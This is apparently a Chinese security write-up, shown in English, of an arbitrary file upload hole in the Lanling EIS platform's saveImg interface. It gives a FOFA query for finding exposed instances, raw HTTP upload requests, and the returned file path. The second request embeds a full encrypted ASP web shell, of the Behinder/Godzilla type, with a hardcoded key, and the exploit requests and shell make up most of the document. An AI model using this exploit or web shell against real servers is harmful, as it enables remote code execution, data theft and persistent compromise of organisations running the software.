There is an arbitrary file upload vulnerability in the saveImg interface of Lanling EIS smart collaboration platform
Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.
1. Introduction to Lanling EIS
Lanling Smart Collaboration Platform eis integrates a very rich module to meet the needs of organizations and enterprises in knowledge, collaboration, project management system construction, etc.
2. Vulnerability description
Lanling Intelligent Collaboration Platform EIS integrates a very rich module to meet the needs of organizations and enterprises in knowledge, collaboration, project management system construction and other needs. There is an arbitrary file upload vulnerability in the platform's saveImg interface, through which weshell can be uploaded.
3. Affected versions
Lanling Intelligent Collaboration Platform EIS
4. fofa query statement
icon_hash=“953405444”
5. Recurrence of vulnerabilities
Vulnerability link: http://127.0.0.1/eis/service/api.aspx?action=saveImg
Vulnerability packet:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html
578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--
After sending the vulnerability data packet, the uploaded path will be returned.
Spliced uploaded file path: http://127.0.0.1/files/editor_img/20231019212439970030/20231019212439970030.asp
burp package
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950
--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html
<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
Set oXML = Nothing
End Function
Function decryption(content,isBin)
dim size,i,result,keySize
keySize = len(key)
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.CharSet = "iso-8859-1"
BinaryStream.Type = 2
BinaryStream.Open
if IsArray(content) then
size=UBound(content)+1
For i=1 To size
BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
Next
end if
BinaryStream.Position = 0
if isBin then
BinaryStream.Type = 1
decryption=BinaryStream.Read()
else
decryption=BinaryStream.ReadText()
end if
End Function
key="3c6e0b8a9c15224a"
content=request.Form("123456")
if not IsEmpty(content) then
if IsEmpty(Session("payload")) then
content=decryption(Base64Decode(content),false)
Session("payload")=content
response.End
else
content=decryption(Base64Decode(content),true)
bypassDictionary.Add "payload",Session("payload")
Execute(bypassDictionary("payload"))
result=run(content)
response.Write("ca0be7")
if not IsEmpty(result) then
response.Write Base64Encode(decryption(result,true))
end if
response.Write("2d6353")
end if
end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--